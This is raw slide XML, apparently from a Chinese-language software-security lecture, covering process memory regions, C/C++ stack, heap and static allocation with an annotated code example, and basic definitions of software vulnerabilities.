          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4553272" y="4724400"/>
            <a:ext cx="2449513" cy="503238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>DLL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4553272" y="4219575"/>
            <a:ext cx="2449513" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>代码段</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缓冲区与内存分布</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286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根据进程使用的内存区域的预订功能划分：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>代码区</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>只读，存储二进制代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>静态数据区</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>存储全局变量，包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>data segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>（初始化数据区）和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>bss segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>（未初始化数据区）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>动态数据区</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>栈区：存储函数调用关系及函数内部变量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>堆区：存储动态申请内存空间</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C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语言中内存分配</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3277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a:t>栈：由编译器自动分配释放</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>堆：一般由程序员分配释放，若程序员不释放，程序结束时可能由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>回收</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>全局区（静态区）：全局变量和静态变量的存储是放在一块的，初始化的全局变量和静态变量在一块区域，未初始化的全局变量和未初始化的静态变量在相邻的另一块区域。程序结束释放</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>常量：程序结束释放</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="320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a:t>在函数体中定义的变量通常是在栈上，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>calloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>realloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>等分配内存的函数分配得到的就是在堆上。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>在所有函数体外定义的是全局量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>修饰符对应的变量存放在全局区（静态区）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>函数中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>adgfdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>这样的字符串存放在常量区</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软件漏洞的定义</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="717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定义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>软件的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>具体实现</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>系统安全策略</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>上存在的缺陷，从而可以使攻击者能够在未授权的情况下访问或破坏系统</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="890588" y="3085277"/>
            <a:ext cx="7643812" cy="3512077"/>
            <a:chOff x="785754" y="2743536"/>
            <a:chExt cx="7643898" cy="3693493"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="785754" y="3028734"/>
              <a:ext cx="7643898" cy="34082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nSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buBlip>
                  <a:blip r:embed="rId2"/>
                </a:buBlip>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>程序漏洞</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>：由于程序（</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Web</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>，二进制）存在安全缺陷，导致攻击者恶意构造的数据进入程序相关代码时，会</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>改变程序原定的执行流程</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>，从而实现破坏或获取超出原来权利的能力。</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:buFontTx/>
                <a:buBlip>
                  <a:blip r:embed="rId2"/>
                </a:buBlip>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>安全策略漏洞</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>：由于软件安全策略设置不够严谨或未做设置，导致攻击者能够在未授权的情况下获得对目标系统</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>原本不应拥有</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>的访问或控制权限。</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="下箭头 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3857620" y="2743536"/>
              <a:ext cx="214314" cy="285752"/>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2400" dirty="0"/>
              <a:t>int a = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>char *p1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>void main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    int b;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    char s[] = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    char *p2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    char *p3 = "123456";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    static int c = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    p1 = (char *)malloc(10); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    p2 = (char *)malloc(20);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(p1, "123456");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="圆角矩形标注 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051050" y="911225"/>
            <a:ext cx="3816350" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -54067"/>
              <a:gd name="adj2" fmla="val -27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全局初始化区</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="圆角矩形标注 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2124075" y="1341438"/>
            <a:ext cx="3816350" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -54067"/>
              <a:gd name="adj2" fmla="val -27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全局未初始化区</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="圆角矩形标注 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3600450" y="3068638"/>
            <a:ext cx="863600" cy="576262"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -74549"/>
              <a:gd name="adj2" fmla="val -53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rPr>
              <a:t>栈</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="圆角矩形标注 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4248150" y="3643313"/>
            <a:ext cx="3384550" cy="576262"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -58644"/>
              <a:gd name="adj2" fmla="val 38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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>123456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在常量区，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在栈上</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="圆角矩形标注 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2530475" y="3441700"/>
            <a:ext cx="863600" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -74549"/>
              <a:gd name="adj2" fmla="val -53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rPr>
              <a:t>栈</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="圆角矩形标注 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4248150" y="4252913"/>
            <a:ext cx="3384550" cy="576262"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -57989"/>
              <a:gd name="adj2" fmla="val -2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全局初始化区</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="圆角矩形标注 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4643438" y="4829175"/>
            <a:ext cx="865187" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -74549"/>
              <a:gd name="adj2" fmla="val -53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rPr>
              <a:t>堆</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="圆角矩形标注 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4656138" y="5461000"/>
            <a:ext cx="863600" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -83083"/>
              <a:gd name="adj2" fmla="val -29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rPr>
              <a:t>堆</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="圆角矩形标注 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4224338" y="6046788"/>
            <a:ext cx="3948112" cy="576262"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -83083"/>
              <a:gd name="adj2" fmla="val -29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rPr>
              <a:t>123456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>放在常量区，编译器可能会将它与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>所指向的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"123456"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>优化成一块</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down)">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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down)">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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down)">
                                      <p:cBhvr>
                                        <p:cTn id="7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C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语言中内存分配</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="436563" y="877888"/>
            <a:ext cx="8229600" cy="5818187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>栈</a:t>
            </a:r>
          </a:p>
          <a:p>
